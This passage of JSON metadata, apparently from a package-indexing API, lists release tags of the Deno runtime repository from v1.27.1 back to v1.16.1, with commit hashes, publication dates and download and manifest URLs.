g:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_ur